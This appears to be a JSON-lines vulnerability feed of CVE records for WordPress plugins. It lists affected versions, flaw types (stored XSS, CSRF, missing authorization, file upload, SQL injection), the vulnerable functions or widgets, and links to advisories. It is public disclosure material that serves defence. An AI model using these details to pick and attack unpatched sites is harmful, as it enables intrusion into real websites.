{"CVE_ID":"CVE-2024-10222","slug":"svg-support","versionImpact":"2.5.10","description":"The SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.5.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. By default, this can only be exploited by administrators, but the ability to upload SVG files can be extended to authors.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/benbodhi\\\/svg-support\\\/commit\\\/eee3e13b650511c9cc9ee0746be485d031c7c072\",\"name\":\"https:\\\/\\\/github.com\\\/benbodhi\\\/svg-support\\\/commit\\\/eee3e13b650511c9cc9ee0746be485d031c7c072\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244181\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244181\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5852f08d-0506-464e-afd1-c625e4034e1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5852f08d-0506-464e-afd1-c625e4034e1d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1363","slug":"easy-broken-link-checker","versionImpact":"9.0.2","description":"The URL Shortener | Conversion Tracking  | AB Testing  | WooCommerce WordPress plugin through 9.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16b08e77-3562-4506-9b28-abd1b1128b0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16b08e77-3562-4506-9b28-abd1b1128b0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31597","slug":"ultimate-live-cricket-lite","versionImpact":"1.4.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in crazycric Ultimate Live Cricket WordPress Lite allows Stored XSS. This issue affects Ultimate Live Cricket WordPress Lite: from n\/a through 1.4.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ultimate-live-cricket-lite\\\/vulnerability\\\/wordpress-ultimate-live-cricket-wordpress-lite-plugin-1-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ultimate-live-cricket-lite\\\/vulnerability\\\/wordpress-ultimate-live-cricket-wordpress-lite-plugin-1-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4385","slug":"intuitive-custom-post-order","versionImpact":"3.1.3","description":"The Intuitive Custom Post Order WordPress plugin through 3.1.3 does not check for authorization in the update-menu-order ajax action, allowing any logged in user (with roles as low as Subscriber) to update the menu order","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f900d37-6eee-4434-8b9b-d10cc4a9167c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f900d37-6eee-4434-8b9b-d10cc4a9167c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4366","slug":"pwa-for-wp","versionImpact":"1.7.32","description":"The PWA for WP & AMP plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the  pwaforwp_update_features_options function in versions up to, and including, 1.7.32. This makes it possible for authenticated attackers to change the otherwise restricted settings within the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9892dd1-3939-41a9-a828-fa1bf7d96eb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9892dd1-3939-41a9-a828-fa1bf7d96eb8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-pwa-for-wp-and-amp-plugin-fixed-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-pwa-for-wp-and-amp-plugin-fixed-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b38a51d7-375e-4cca-88ba-ccab796ac134\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b38a51d7-375e-4cca-88ba-ccab796ac134\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4404","slug":"event-espresso-decaf","versionImpact":"4.10.11","description":"The Event Espresso 4 Decaf plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.10.11. This is due to missing or incorrect nonce validation on the ajaxHandler() function. This makes it possible for unauthenticated attackers to op into notifications via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89d3a9da-2496-4f75-ad8f-65629f198fe5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89d3a9da-2496-4f75-ad8f-65629f198fe5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2554360\\\/event-espresso-decaf\\\/trunk\\\/core\\\/domain\\\/services\\\/pue\\\/Stats.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2554360\\\/event-espresso-decaf\\\/trunk\\\/core\\\/domain\\\/services\\\/pue\\\/Stats.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6925","slug":"unlimited-addons-for-wpbakery-page-builder","versionImpact":"1.0.42","description":"The Unlimited Addons for WPBakery Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'importZipFile' function in versions up to, and including, 1.0.42. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin (the default is editor role, but access can also be granted to contributor role), to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a78b76d6-4068-4141-9726-7db439aa6a9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a78b76d6-4068-4141-9726-7db439aa6a9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-addons-for-wpbakery-page-builder\\\/trunk\\\/inc_php\\\/layouts\\\/unitecreator_layouts_exporter.class.php?rev=2900676#L703\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-addons-for-wpbakery-page-builder\\\/trunk\\\/inc_php\\\/layouts\\\/unitecreator_layouts_exporter.class.php?rev=2900676#L703\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1500","slug":"royal-elementor-addons","versionImpact":"1.3.91","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Logo Widget in all versions up to, and including, 1.3.91 due to insufficient input sanitization and output escaping on user supplied URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8619c999-5cf7-4888-bdb2-815238411303?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8619c999-5cf7-4888-bdb2-815238411303?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/logo\\\/widgets\\\/wpr-logo.php#L644\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/logo\\\/widgets\\\/wpr-logo.php#L644\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/logo\\\/widgets\\\/wpr-logo.php#L664\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/logo\\\/widgets\\\/wpr-logo.php#L664\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037411%40royal-elementor-addons%2Ftags%2F1.3.91&new=3038353%40royal-elementor-addons%2Ftags%2F1.3.92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037411%40royal-elementor-addons%2Ftags%2F1.3.91&new=3038353%40royal-elementor-addons%2Ftags%2F1.3.92\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4532","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as deleting cards via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64cf5f95-bbf0-4c5f-867b-62f1b7f6a42e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64cf5f95-bbf0-4c5f-867b-62f1b7f6a42e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6896","slug":"accelerated-mobile-pages","versionImpact":"1.0.96.1","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.96.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a5fdb9-4e36-43ce-88ce-cd75bb1d1e25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a5fdb9-4e36-43ce-88ce-cd75bb1d1e25?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.96.1\\\/templates\\\/features.php#L7159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.96.1\\\/templates\\\/features.php#L7159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accelerated-mobile-pages\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accelerated-mobile-pages\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123278\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123278\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0926","slug":"custom-permalinks","versionImpact":"2.6.0","description":"The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-permalinks\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-permalinks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/samiahmedsiddiqui\\\/custom-permalinks\\\/pull\\\/96\",\"name\":\"https:\\\/\\\/github.com\\\/samiahmedsiddiqui\\\/custom-permalinks\\\/pull\\\/96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138206\\\/custom-permalinks\\\/trunk\\\/admin\\\/class-custom-permalinks-post-types-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138206\\\/custom-permalinks\\\/trunk\\\/admin\\\/class-custom-permalinks-post-types-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138206\\\/custom-permalinks\\\/trunk\\\/admin\\\/class-custom-permalinks-taxonomies-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138206\\\/custom-permalinks\\\/trunk\\\/admin\\\/class-custom-permalinks-taxonomies-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10665","slug":"yaad-sarig-payment-gateway-for-wc","versionImpact":"2.2.4","description":"The Yaad Sarig Payment Gateway For WC plugin for WordPress is vulnerable to unauthorized modification & access of data due to a missing capability check on the yaadpay_view_log_callback() and yaadpay_delete_log_callback() functions in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view and delete logs.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10409673-43dc-4c05-a996-120d753ebd6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10409673-43dc-4c05-a996-120d753ebd6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaad-sarig-payment-gateway-for-wc\\\/trunk\\\/classes\\\/class-wc-gateway-yaadpay.php#L2518\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaad-sarig-payment-gateway-for-wc\\\/trunk\\\/classes\\\/class-wc-gateway-yaadpay.php#L2518\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11353","slug":"clicksend-lead-capture-form","versionImpact":"1.1.0","description":"The SMS for Lead Capture Forms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_message() function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary messages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicksend-lead-capture-form\\\/trunk\\\/clicksend-SMS-form-settings.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicksend-lead-capture-form\\\/trunk\\\/clicksend-SMS-form-settings.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicksend-lead-capture-form\\\/trunk\\\/clicksend-SMS-form-settings.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicksend-lead-capture-form\\\/trunk\\\/clicksend-SMS-form-settings.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0c68bb6-77a2-4232-923a-37f2c0327743?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0c68bb6-77a2-4232-923a-37f2c0327743?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13709","slug":"linear","versionImpact":"2.8.1","description":"The Linear plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on the 'linear-debug'. This makes it possible for unauthenticated attackers to reset the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linear\\\/trunk\\\/includes\\\/class-linear-settings.php#L1874\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linear\\\/trunk\\\/includes\\\/class-linear-settings.php#L1874\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83af4ee4-2763-4706-8cb2-fa102a72be68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83af4ee4-2763-4706-8cb2-fa102a72be68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1489","slug":"wp-appbox","versionImpact":"4.5.4","description":"The WP-Appbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's appbox shortcode in all versions up to, and including, 4.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244084\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244084\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-appbox\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-appbox\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d58355d-2762-4ecc-aec2-52a1e3323017?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d58355d-2762-4ecc-aec2-52a1e3323017?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1362","slug":"easy-broken-link-checker","versionImpact":"9.0.2","description":"The URL Shortener | Conversion Tracking  | AB Testing  | WooCommerce WordPress plugin through 9.0.2 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting customers via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/035cc502-a514-440f-8808-5655c8c915e2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/035cc502-a514-440f-8808-5655c8c915e2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31585","slug":"leadfox","versionImpact":"2.1.8","description":"Cross-Site Request Forgery (CSRF) vulnerability in leadfox Leadfox for WordPress allows Cross Site Request Forgery. This issue affects Leadfox for WordPress: from n\/a through 2.1.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/leadfox\\\/vulnerability\\\/wordpress-leadfox-for-wordpress-plugin-2-1-8-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/leadfox\\\/vulnerability\\\/wordpress-leadfox-for-wordpress-plugin-2-1-8-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2921","slug":"shorten-url","versionImpact":"1.6.8","description":"The Short URL WordPress plugin through 1.6.8 does not properly sanitise and escape a parameter before using it in SQL statement, leading to a SQL injection exploitable by users with relatively low privilege on the site, like subscribers.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f85db4f-8493-4941-8f3c-e5258c581bdc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f85db4f-8493-4941-8f3c-e5258c581bdc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4365","slug":"nmedia-user-file-uploader","versionImpact":"18.2","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in versions up to, and including, 18.2. This is due to lacking authentication protections and santisation all on the wpfm_edit_file_title_desc AJAX action. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9c82154-d390-44ba-a54a-89f4bb69cdce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9c82154-d390-44ba-a54a-89f4bb69cdce?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1377","slug":"happy-elementor-addons","versionImpact":"3.10.3","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018author_meta_tag\u2019 attribute of the Author Meta widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b61eb8b7-0d89-47ef-831c-1772d01e2c85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b61eb8b7-0d89-47ef-831c-1772d01e2c85?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044937\\\/happy-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044937\\\/happy-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4531","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as editing cards via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18c1b3bb-9998-416f-a972-c4a51643579c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18c1b3bb-9998-416f-a972-c4a51643579c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4615","slug":"elespare","versionImpact":"3.1.2","description":"The Elespare \u2013 Blog, Magazine and Newspaper Addons for Elementor with Templates, Widgets, Kits, and Header\/Footer Builder. One Click Import: No Coding Required! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Horizontal Nav Menu' widget in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97a1ab2f-b531-46a7-ad51-a652fc078212?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97a1ab2f-b531-46a7-ad51-a652fc078212?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elespare\\\/trunk\\\/src\\\/widgets\\\/nav-menu-horizontal\\\/widget.php#L856\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elespare\\\/trunk\\\/src\\\/widgets\\\/nav-menu-horizontal\\\/widget.php#L856\",\"refsource\":\"\",\"tags\":[]}]"}
